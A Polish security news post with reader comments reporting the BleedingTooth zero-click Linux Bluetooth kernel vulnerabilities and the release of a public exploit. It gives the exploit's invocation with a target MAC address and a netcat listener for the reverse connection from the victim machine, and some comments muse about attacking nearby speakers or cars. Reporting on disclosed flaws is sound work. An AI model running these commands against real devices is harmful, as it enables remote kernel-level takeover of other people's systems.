BleedingTooth – dostępny jest exploit umożliwiający na zdalne wykonanie kodu na Linuksach (uprawnienia kernel, przez BlueTooth, bez interakcji ofiary)

08 kwietnia 2021, 17:39 | W biegu | komentarzy 14
: oglądaj sekurakowe live-streamy o bezpieczeństwie IT.

Badacz z Google udostępnił szczegóły podatności oraz możliwości jej wyeksploitowania. Żeby być nieco bardziej dokładnym mówimy tutaj o całej serii podatności:

BleedingTooth is a set of zero-click vulnerabilities in the Linux Bluetooth subsystem that can allow an unauthenticated remote attacker in short distance to execute arbitrary code with kernel privileges on vulnerable devices.

W ramach pocieszenia – luki zostały załatane w 2020 roku, więc kto w miarę często łata swoje urządzenia – powinien spać spokojnie. Dla niepocieszenia – zapewne wiele urządzeń bazujących na Linuksie, a komunikujących się Bluetoothem w ogóle nie dostało łatki…

Tutaj dostępny jest PoC – a w zasadzie pełen exploit. Był on testowany w takiej konfiguracji:

Dell XPS 15 running Ubuntu 20.04.1 LTS with 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

Całość sprowadza się do odpalenia: sudo ./exploit target_mac source_ip source_port
oraz nasłuchiwania na połączenie z atakowanej maszyny – np. tak: $ nc -lvp 1337

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Druid

    Ale czemu netcat’em ten scan? Nie wiem dlatego pytam. Wydawało mi się że netcat nie nadaje się do takich rzeczy. Szukam właśnie informacji na ten temat ale piszą że to takich zadań służy blucat.

    Odpowiedz
    • To nie scan, tylko nasłuchiwanie netcatem na połączenie od ~exploita ;)

      Odpowiedz
      • Druid

        OK :) niedopatrzenie :)

        Odpowiedz
        • Druid

          Pomyślałem o nmap, a napisałem o netcat. To jest głowa. :)

          Odpowiedz
  2. JA?!

    Takie pytanie – czy komputery w autach są na linuksie i jak często dostają aktualizacje?

    Odpowiedz
    • John Sharkrat

      Za każdym razem jak jesteś w serwisie. Jak bywasz na przeglądach, to wgrywają za darmo. Jeśli nie bywasz, a pojawisz się od święta, to za aktualizacje płacisz.

      Odpowiedz
    • Klub Pana Rysia

      Tak, najczesciej nie dostaja aktualizacji nigdy. Jak bede mial chwile to zejde z lapkiem i sprawdze.

      Odpowiedz
      • hail

        to jak znajdziesz chwilę i sprawdzisz to napisz jak wyszły testy :)

        Odpowiedz
    • mr

      Najczęściej to android, czyli Linux ;)

      Odpowiedz
  3. Patryk

    Wreszcie cos na te wku..iajace glosniki z bluetoothem :)

    Odpowiedz
    • o.o

      nethunter bluetooth arsenal

      Odpowiedz
  4. Filip

    To glownie uderzy w IoT.

    Odpowiedz
  5. gienion

    Czy dobrze rozumiem, w opisie jest „zero click” i „unauthenticated remote attacker” ale do dema ataku exploitem wymagane jest uruchomienie skryptu przez usera z prawami administratora? Tylko mnie się coś nie klei?:)

    Odpowiedz
    • wymagane jest od atakującego odpalenie exploitu :)

      Odpowiedz

Odpowiedz